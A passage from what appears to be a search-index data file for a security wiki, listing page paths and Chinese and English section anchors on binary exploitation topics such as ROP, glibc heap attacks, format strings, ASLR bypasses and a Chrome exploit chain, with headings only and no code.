programing/ret2csu.html#为什么不直接使用libc","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#ret2dlresolve","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#攻击总结","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#示例","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#纯-pwntools","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#原始","binary-exploitation/rop-return-oriented-programing/ret2dlresolve.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2esp--ret2reg","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2esp","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#缺乏空间","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#示例","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2reg","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#示例-1","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#arm64","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2sp","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#ret2reg-1","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#protections","binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.html#references","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#ret2lib","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#示例步骤简化","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#查找地址","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#使用-gdb-peda--gef","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#使用-procmaps","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#未知的libc","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#通过2个偏移量识别libc","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#绕过32位的aslr","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#one-gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#x86-ret2lib-代码示例","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#x64-ret2lib-代码示例","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#arm64-ret2lib-示例","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#ret-into-printf或-puts","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#ret2printf","binary-exploitation/rop-return-oriented-programing/ret2lib/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#使用-rop-泄露-libc-地址","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#快速概述","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#其他教程和二进制文件以供练习","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#代码","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#rop---泄露-libc-模板","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#1--查找偏移量","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#2--寻找-gadgets","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#3--查找-libc-库","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#31--搜索libc版本-1","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#32--搜索libc版本-2","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#33--其他泄露函数","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#4--查找基于-libc-地址并利用","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#42--使用-one_gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#exploit-file","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#常见问题","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#main_plt--elfsymbolsmain-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#puts未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/index.html#sh-1-ssssssss-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#泄露libc---模板","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#常见问题","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#main_plt--elfsymbolsmain-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#puts未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.html#sh-1-ssssssss-未找到","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#one-gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#arm64","binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.html#angry-gadget","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#ret2lib--printf-leak---arm64","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#ret2lib---nx-绕过与-rop-无-aslr","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找偏移量","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#x30-偏移量","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找-system-和-binsh-字符串","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找-gadgets","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#exploit","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#ret2lib---nx-asl--pie-绕过与来自栈的-printf-泄漏","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#pie-和-aslr-但没有-canary","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#printf-泄露","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#x30-偏移量-1","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#查找-gadgets-1","binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.html#exploit-1","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#ret2syscall","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#寄存器-gadgets","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#写字符串","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#可写内存","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#在内存中写入字符串","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#自动化-rop-链","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#缺少小工具","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#利用示例","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#ret2syscall---arm64","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#代码","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#gadgets","binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.html#利用","binary-exploitation/rop-return-oriented-programing/ret2vdso.html#ret2vdso","binary-exploitation/rop-return-oriented-programing/ret2vdso.html#基本信息","binary-exploitation/rop-return-oriented-programing/ret2vdso.html#arm64","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#srop---sigreturn-oriented-programming","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#示例","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#-tip","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#pwntools-示例","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#bof-示例","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#代码","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#exploit","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#bof-示例无需-sigreturn","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#代码-1","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#利用","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#自动查找-sigreturn-gadgets-2023-2025","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#使用-rop-链接-srop通过-mprotect-进行转移","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#内核验证pac-和-shadow-stacks","binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.html#参考文献","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#synology-patspk-加密档案解密","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#概述","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#1-获取档案","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#2-转储-pat-结构可选","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#3-提取-synology-解压库","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#4-恢复硬编码的密钥-get_keys","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#5-头结构与签名验证","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#6-派生每个归档的子密钥","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#7-synology的自定义--libarchive--后端","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#spk_read_header","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#spk_read_data","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#8-使用-synodecrypt-解密所有内容","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#9-常见陷阱","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#10-额外工具","hardware-physical-access/firmware-analysis/synology-encrypted-archive-decryption.html#参考文献","binary-exploitation/stack-overflow/windows-seh-overflow.html#windows-基于-seh-的堆栈溢出利用-nsehseh","binary-exploitation/stack-overflow/windows-seh-overflow.html#finding-exact-offsets-nseh--seh","binary-exploitation/stack-overflow/windows-seh-overflow.html#choosing-a-pop-pop-ret-seh-gadget","binary-exploitation/stack-overflow/windows-seh-overflow.html#jump-back-technique-short--near-jmp","binary-exploitation/stack-overflow/windows-seh-overflow.html#坏字符","binary-exploitation/stack-overflow/windows-seh-overflow.html#shellcode-生成-x86","binary-exploitation/stack-overflow/windows-seh-overflow.html#delivering-over-http-precise-crlf--content-length","binary-exploitation/stack-overflow/windows-seh-overflow.html#工具","binary-exploitation/stack-overflow/windows-seh-overflow.html#注意事项与限制","binary-exploitation/stack-overflow/windows-seh-overflow.html#references","binary-exploitation/array-indexing.html#数组索引","binary-exploitation/array-indexing.html#基本信息","binary-exploitation/chrome-exploiting.html#chrome-exploiting","binary-exploitation/chrome-exploiting.html#1-chrome-架构回顾","binary-exploitation/chrome-exploiting.html#2-阶段-1--webassembly-类型混淆-cve-2025-0291","binary-exploitation/chrome-exploiting.html#3-第二阶段--逃离-v8-沙箱-issue-379140430","binary-exploitation/chrome-exploiting.html#4-stage-3--renderer--os-sandbox-escape-cve-2024-11114","binary-exploitation/chrome-exploiting.html#5-完整链流程","binary-exploitation/chrome-exploiting.html#6-实验室与调试设置","binary-exploitation/chrome-exploiting.html#收获","binary-exploitation/chrome-exploiting.html#参考","binary-exploitation/integer-overflow-and-underflow.html#integer-overflow","binary-exploitation/integer-overflow-and-underflow.html#基本信息","binary-exploitation/integer-overflow-and-underflow.html#最大值","binary-exploitation/integer-overflow-and-underflow.html#示例","binary-exploitation/integer-overflow-and-underflow.html#纯溢出","binary-exploitation/integer-overflow-and-underflow.html#signed-to-unsigned-conversion","binary-exploitation/integer-overflow-and-underflow.html#macos-溢出示例","binary-exploitation/integer-overflow-and-underflow.html#macos-underflow-示例","binary-exploitation/integer-overflow-and-underflow.html#other-examples","binary-exploitation/integer-overflow-and-underflow.html#arm64","binary-exploitation/format-strings/index.html#format-strings","binary-exploitation/format-strings/index.html#基本信息","binary-exploitation/format-strings/index.html#访问指针","binary-exploitation/format-strings/index.html#arbitrary-read","binary-exploitation/format-strings/index.html#查找偏移","binary-exploitation/format-strings/index.html#有何用途","binary-exploitation/format-strings/index.html#arbitrary-write","binary-exploitation/format-strings/index.html#pwntools-模板","binary-exploitation/format-strings/index.html#format-strings-to-bof","binary-exploitation/format-strings/index.html#windows-x64-format-string-leak-to-bypass-aslr-no-varargs","binary-exploitation/format-strings/index.html#其他示例与参考","binary-exploitation/format-strings/index.html#参考资料","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#格式字符串---任意读取示例","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#读取二进制开始","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#代码","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#利用","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#读取密码","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#从栈中读取","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#读取数据","binary-exploitation/format-strings/format-strings-arbitrary-read-example.html#exploit","binary-exploitation/format-strings/format-strings-template.html#格式字符串模板","binary-exploitation/libc-heap/index.html#libc-heap","binary-exploitation/libc-heap/index.html#heap-basics","binary-exploitation/libc-heap/index.html#basic-chunk-allocation","binary-exploitation/libc-heap/index.html#arenas","binary-exploitation/libc-heap/index.html#subheaps","binary-exploitation/libc-heap/index.html#heap_info","binary-exploitation/libc-heap/index.html#malloc_state","binary-exploitation/libc-heap/bins-and-memory-allocations.html#bins--memory-allocations","binary-exploitation/libc-heap/bins-and-memory-allocations.html#基本信息","binary-exploitation/libc-heap/bins-and-memory-allocations.html#tcache每线程缓存bins","binary-exploitation/libc-heap/bins-and-memory-allocations.html#快速-bins","binary-exploitation/libc-heap/bins-and-memory-allocations.html#未排序的堆","binary-exploitation/libc-heap/bins-and-memory-allocations.html#小型桶","binary-exploitation/libc-heap/bins-and-memory-allocations.html#大型内存块","binary-exploitation/libc-heap/bins-and-memory-allocations.html#顶部块","binary-exploitation/libc-heap/bins-and-memory-allocations.html#最后剩余","binary-exploitation/libc-heap/bins-and-memory-allocations.html#分配流程","binary-exploitation/libc-heap/bins-and-memory-allocations.html#释放流程","binary-exploitation/libc-heap/bins-and-memory-allocations.html#堆函数安全检查","binary-exploitation/libc-heap/bins-and-memory-allocations.html#参考文献","binary-exploitation/libc-heap/heap-memory-functions/index.html#堆内存函数","binary-exploitation/libc-heap/heap-memory-functions/index.html","binary-exploitation/libc-heap/heap-memory-functions/free.html#free","binary-exploitation/libc-heap/heap-memory-functions/free.html#free-order-summary","binary-exploitation/libc-heap/heap-memory-functions/free.html#__libc_free","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-开始","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-tcache","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-fast-bin","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free-finale","binary-exploitation/libc-heap/heap-memory-functions/free.html#_int_free_merge_chunk","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#malloc--sysmalloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#allocation-order-summary","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#__libc_malloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#_int_malloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#arena","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#fast-bin","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#小型空闲区","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#malloc_consolidate","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#未排序的堆","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#大块按索引","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#大块下一个更大","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#顶部块","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-开始","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-检查","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-不是主区域","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-主区域","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-主区域之前的错误-1","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-主区域继续","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc-finale","binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.html#sysmalloc_mmap","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#unlink","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#代码","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#图形解释","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#安全检查","binary-exploitation/libc-heap/heap-memory-functions/unlink.html#泄漏","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#heap-functions-security-checks","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#unlink","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_malloc","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#tcache_get_n","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#tcache_thread_shutdown","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#__libc_realloc","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_free","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_free_merge_chunk","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_free_create_chunk","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#do_check_malloc_state","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#malloc_consolidate","binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.html#_int_realloc","binary-exploitation/libc-heap/use-after-free/index.html#use-after-free","binary-exploitation/libc-heap/use-after-free/index.html#basic-information","binary-exploitation/libc-heap/use-after-free/index.html#first-fit-attack","binary-exploitation/libc-heap/use-after-free/first-fit.html#first-fit","binary-exploitation/libc-heap/use-after-free/first-fit.html#first-fit-1","binary-exploitation/libc-heap/use-after-free/first-fit.html#unsorted-bins","binary-exploitation/libc-heap/use-after-free/first-fit.html#fastbins","binary-exploitation/libc-heap/use-after-free/first-fit.html#-现代-glibc-考虑事项-tcache--226","binary-exploitation/libc-heap/use-after-free/first-fit.html#-使用首次适应制作重叠块的-uaf","binary-exploitation/libc-heap/use-after-free/first-fit.html#--缓解措施与加固","binary-exploitation/libc-heap/use-after-free/first-fit.html#其他参考与示例","binary-exploitation/libc-heap/double-free.html#double-free","binary-exploitation/libc-heap/double-free.html#基本信息","binary-exploitation/libc-heap/double-free.html#示例","binary-exploitation/libc-heap/double-free.html#参考","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#重写已释放的块","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#简单的使用后释放","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#双重释放","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#堆溢出","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#一偏移溢出","binary-exploitation/libc-heap/heap-overflow.html#heap-overflow","binary-exploitation/libc-heap/heap-overflow.html#基本信息","binary-exploitation/libc-heap/heap-overflow.html#栈溢出与堆溢出","binary-exploitation/libc-heap/heap-overflow.html#示例-libc","binary-exploitation/libc-heap/heap-overflow.html#示例-arm64","binary-exploitation/libc-heap/heap-overflow.html#其他示例","binary-exploitation/libc-heap/heap-overflow.html#真实世界示例cve-2025-40597--错误使用-__sprintf_chk","binary-exploitation/libc-heap/heap-overflow.html#references","binary-exploitation/libc-heap/unlink-attack.html#unlink-attack","binary-exploitation/libc-heap/unlink-attack.html#基本信息","binary-exploitation/libc-heap/unlink-attack.html#代码示例","binary-exploitation/libc-heap/unlink-attack.html#目标","binary-exploitation/libc-heap/unlink-attack.html#要求","binary-exploitation/libc-heap/unlink-attack.html#攻击","binary-exploitation/libc-heap/unlink-attack.html#参考","binary-exploitation/libc-heap/fast-bin-attack.html#fast-bin-attack","binary-exploitation/libc-heap/fast-bin-attack.html#基本信息","binary-exploitation/libc-heap/fast-bin-attack.html#示例","binary-exploitation/libc-heap/unsorted-bin-attack.html#unsorted-bin-attack","binary-exploitation/libc-heap/unsorted-bin-attack.html#基本信息","binary-exploitation/libc-heap/unsorted-bin-attack.html#写入是如何实际发生的","binary-exploitation/libc-heap/unsorted-bin-attack.html#现代限制glibc--233","binary-exploitation/libc-heap/unsorted-bin-attack.html#最小利用流程modern-glibc","binary-exploitation/libc-heap/unsorted-bin-attack.html#unsorted-bin-infoleak-attack","binary-exploitation/libc-heap/unsorted-bin-attack.html#参考与其他示例","binary-exploitation/libc-heap/unsorted-bin-attack.html#参考资料","binary-exploitation/libc-heap/large-bin-attack.html#large-bin-attack","binary-exploitation/libc-heap/large-bin-attack.html#basic-information","binary-exploitation/libc-heap/large-bin-attack.html#其他示例","binary-exploitation/libc-heap/tcache-bin-attack.html#tcache-bin-attack","binary-exploitation/libc-heap/tcache-bin-attack.html#basic-information","binary-exploitation/libc-heap/tcache-bin-attack.html#tcache-indexes-attack","binary-exploitation/libc-heap/tcache-bin-attack.html#examples","binary-exploitation/libc-heap/off-by-one-overflow.html#off-by-one-overflow","binary-exploitation/libc-heap/off-by-one-overflow.html#基本信息","binary-exploitation/libc-heap/off-by-one-overflow.html#代码示例","binary-exploitation/libc-heap/off-by-one-overflow.html#目标","binary-exploitation/libc-heap/off-by-one-overflow.html#要求","binary-exploitation/libc-heap/off-by-one-overflow.html#一般的越界攻击","binary-exploitation/libc-heap/off-by-one-overflow.html#越界空指针攻击","binary-exploitation/libc-heap/off-by-one-overflow.html#其他示例与参考","binary-exploitation/libc-heap/house-of-spirit.html#house-of-spirit","binary-exploitation/libc-heap/house-of-spirit.html#基本信息","binary-exploitation/libc-heap/house-of-spirit.html#代码","binary-exploitation/libc-heap/house-of-spirit.html#目标","binary-exploitation/libc-heap/house-of-spirit.html#要求","binary-exploitation/libc-heap/house-of-spirit.html#攻击","binary-exploitation/libc-heap/house-of-spirit.html#示例","binary-exploitation/libc-heap/house-of-spirit.html#参考","binary-exploitation/libc-heap/house-of-lore.html#house-of-lore--small-bin-attack","binary-exploitation/libc-heap/house-of-lore.html#基本信息","binary-exploitation/libc-heap/house-of-lore.html#代码","binary-exploitation/libc-heap/house-of-lore.html#目标","binary-exploitation/libc-heap/house-of-lore.html#要求","binary-exploitation/libc-heap/house-of-lore.html#攻击","binary-exploitation/libc-heap/house-of-lore.html#参考","binary-exploitation/libc-heap/house-of-einherjar.html#house-of-einherjar","binary-exploitation/libc-heap/house-of-einherjar.html#基本信息","binary-exploitation/libc-heap/house-of-einherjar.html#代码","binary-exploitation/libc-heap/house-of-einherjar.html#目标","binary-exploitation/libc-heap/house-of-einherjar.html#要求","binary-exploitation/libc-heap/house-of-einherjar.html#攻击","binary-exploitation/libc-heap/house-of-einherjar.html#参考和其他示例","binary-exploitation/libc-heap/house-of-force.html#house-of-force","binary-exploitation/libc-heap/house-of-force.html#基本信息","binary-exploitation/libc-heap/house-of-force.html#代码","binary-exploitation/libc-heap/house-of-force.html#目标","binary-exploitation/libc-heap/house-of-force.html#要求","binary-exploitation/libc-heap/house-of-force.html#攻击","binary-exploitation/libc-heap/house-of-force.html#参考文献与其他示例","binary-exploitation/libc-heap/house-of-orange.html#house-of-orange","binary-exploitation/libc-heap/house-of-orange.html#基本信息","binary-exploitation/libc-heap/house-of-orange.html#代码","binary-exploitation/libc-heap/house-of-orange.html#目标","binary-exploitation/libc-heap/house-of-orange.html#要求","binary-exploitation/libc-heap/house-of-orange.html#背景","binary-exploitation/libc-heap/house-of-orange.html#攻击","binary-exploitation/libc-heap/house-of-orange.html#参考","binary-exploitation/libc-heap/house-of-rabbit.html#house-of-rabbit","binary-exploitation/libc-heap/house-of-rabbit.html#requirements","binary-exploitation/libc-heap/house-of-rabbit.html#goals","binary-exploitation/libc-heap/house-of-rabbit.html#steps-of-the-attack","binary-exploitation/libc-heap/house-of-rabbit.html#poc-1-修改快速堆块的大小","binary-exploitation/libc-heap/house-of-rabbit.html#poc-2-修改-fd-指针","binary-exploitation/libc-heap/house-of-rabbit.html#总结","binary-exploitation/libc-heap/house-of-roman.html#house-of-roman","binary-exploitation/libc-heap/house-of-roman.html#基本信息","binary-exploitation/libc-heap/house-of-roman.html#代码","binary-exploitation/libc-heap/house-of-roman.html#目标","binary-exploitation/libc-heap/house-of-roman.html#要求","binary-exploitation/libc-heap/house-of-roman.html#攻击步骤","binary-exploitation/libc-heap/house-of-roman.html#第-1-部分快块块指向-__malloc_hook","binary-exploitation/libc-heap/house-of-roman.html#part-2-unsorted_bin-攻击","binary-exploitation/libc-heap/house-of-roman.html#第-3-步将-__malloc_hook-设置为-system","binary-exploitation/libc-heap/house-of-roman.html#参考","binary-exploitation/common-binary-protections-and-bypasses/index.html#常见的二进制利用保护与绕过","binary-exploitation/common-binary-protections-and-bypasses/index.html#启用核心文件","binary-exploitation/common-binary-protections-and-bypasses/index.html#启用核心转储生成","binary-exploitation/common-binary-protections-and-bypasses/index.html#使用-gdb-分析核心文件","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#aslr","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#检查-aslr-状态","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#禁用-aslr","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#启用-aslr","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#重启后的持久性","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#绕过","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#32位暴力破解","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#64-位栈暴力破解","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#本地信息-procpidstat","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#拥有一个泄漏","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#ret2ret--ret2pop","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#vsyscall","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#vdso","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.html#ret2plt","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.html#其他示例与参考","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#ret2ret--reo2pop","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#ret2ret","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#ret2pop","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#references","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#cet--shadow-stack","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#控制流强制技术-cet","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#影子栈","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#cet-和影子栈如何防止攻击","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#libc-protections","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#chunk-alignment-enforcement","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#security-benefits","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#p